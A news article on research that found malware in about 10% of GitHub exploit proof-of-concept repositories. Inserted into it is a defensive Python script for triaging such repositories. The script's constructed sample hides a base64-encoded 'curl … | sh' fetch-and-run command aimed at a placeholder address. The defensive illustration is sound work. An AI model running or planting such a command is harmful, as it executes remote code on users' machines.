Thousands of GitHub repositories are littered with malware

Instead of a GitHub PoC, you get malware


More than one in every ten GitHub repositories sharing exploit proof-of-concepts could be holding some form of malware or malicious content, putting software developers and cybersecurity researchers at considerable risk, experts have found.

GitHub is used, among other things, to share proof-of-concept (PoC) exploits for various vulnerabilities. That helps researchers and developers verify existing fixes and make sure their products and endpoints are safe from risky flaws.

A report from researchers at the Leiden Institute of Advanced Computer Science analyzing tens of thousands of such repositories found many were distributing fake PoCs which were, instead, holding malware.

Trojans and Cobalt Strike beacons

During the experiment, researchers analyzed roughly 47,300 repositories claiming to be a PoC for a flaw discovered between 2017 and 2021.

They cross-referenced the IP addresses found in the PoCs against public blocklists, VirusTotal (VT) and AbuseIPDB, ran VirusTotal checks on the provided executables and their hashes, and decoded obfuscated files before running the same binary and IP checks on the decoded content.
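The vetting steps above (extract IP addresses, compare them with blocklists, hash executables and compare the hashes with known-bad samples, decode obfuscated blobs and re-run the checks) are the same steps a defender can apply before running anything from a PoC repository. The script below is an added illustration, not the Leiden researchers' tooling: it walks a checkout and applies those checks offline. The IP blocklist, the hash denylist and the sample "repository" it scans are constructed inside the script (documentation-range addresses and a fake "MZ" file), standing in for the VirusTotal and AbuseIPDB lookups a real workflow would use.

```python
import base64
import hashlib
import ipaddress
import re
import tempfile
from pathlib import Path

# Candidate IPv4 addresses and long base64-looking runs.
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
EXEC_SUFFIXES = {".exe", ".dll", ".bin", ".elf"}


def extract_ips(text):
    """Return syntactically valid IPv4 addresses in text, minus loopback,
    link-local and multicast noise. Documentation ranges are deliberately
    kept because the constructed sample below uses them."""
    found = set()
    for candidate in IP_RE.findall(text):
        try:
            ip = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # e.g. 999.1.2.3 matches the regex but is not an address
        if ip.is_loopback or ip.is_link_local or ip.is_multicast:
            continue
        found.add(str(ip))
    return found


def decode_base64_blobs(text):
    """Decode long base64 runs so the IP check also sees hidden content."""
    decoded = []
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (ValueError, TypeError):
            continue  # not valid base64 after all
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def triage_repo(root, ip_blocklist, hash_denylist):
    """Walk a checkout; report blocklisted IPs (plain or base64-hidden) and
    executables whose SHA-256 is on the denylist."""
    root = Path(root)
    findings = {"blocklisted_ips": set(), "bad_hashes": {}, "decoded_blobs": 0}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        if path.suffix.lower() in EXEC_SUFFIXES:
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            if digest in hash_denylist:
                findings["bad_hashes"][str(path.relative_to(root))] = digest
            continue
        text = path.read_text(errors="replace")
        layers = [text] + decode_base64_blobs(text)  # plain text plus decoded blobs
        findings["decoded_blobs"] += len(layers) - 1
        for layer in layers:
            findings["blocklisted_ips"] |= extract_ips(layer) & ip_blocklist
    return findings


# ---- constructed sample data (not from the article or the study) ----
FAKE_EXE = b"MZ\x90\x00 constructed placeholder, not a real PE file"
HIDDEN_COMMAND = b"curl http://198.51.100.7/stage2 | sh"  # 36 bytes -> 48 base64 chars
IP_BLOCKLIST = {"203.0.113.45", "198.51.100.7"}  # stands in for blocklist/AbuseIPDB hits
HASH_DENYLIST = {hashlib.sha256(FAKE_EXE).hexdigest()}  # stands in for a VirusTotal hit


def build_sample_repo(root):
    """Write a small constructed fake 'PoC' checkout into root."""
    root = Path(root)
    (root / "README.md").write_text(
        "PoC for CVE-PLACEHOLDER. Listener defaults to 127.0.0.1; "
        "the 'update server' is 203.0.113.45.\n"
    )
    (root / "exploit.py").write_text(
        'PAYLOAD = "%s"  # decoded and run by the fake PoC\n'
        % base64.b64encode(HIDDEN_COMMAND).decode()
    )
    (root / "loader.exe").write_bytes(FAKE_EXE)


def run_demo():
    """Build the sample checkout in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_repo(tmp)
        return triage_repo(tmp, IP_BLOCKLIST, HASH_DENYLIST)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Running it flags both addresses (one written in the README, one only visible after decoding the base64 blob in `exploit.py`) and the fake executable by hash. Decoding before checking is the step that matters most: the hidden address would never reach a blocklist lookup otherwise, which is exactly why the study decoded obfuscated files before its IP and binary checks.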


What they found was a total of 4,893 repositories being malicious in one way or another. Of the 150,734 unique IP addresses that were extracted, 2,864 were found on blocklists, 1,522 were previously flagged by VirusTotal, and 1,069 were found in AbuseIPDB’s database. Analyzing the binaries on 6,160 executables, researchers found 2,164 malicious samples, hosted in 1,398 repositories.

All in all, the possibility of picking up malware instead of an actual PoC is around 10.3%, researchers concluded. Victims can be infected by a myriad of things, from remote access trojans to Cobalt Strike beacons.


After seeing the results, GitHub moved to remove the malicious content from its platform, but BleepingComputer found at least 60 examples are still pending removal.

Via: BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
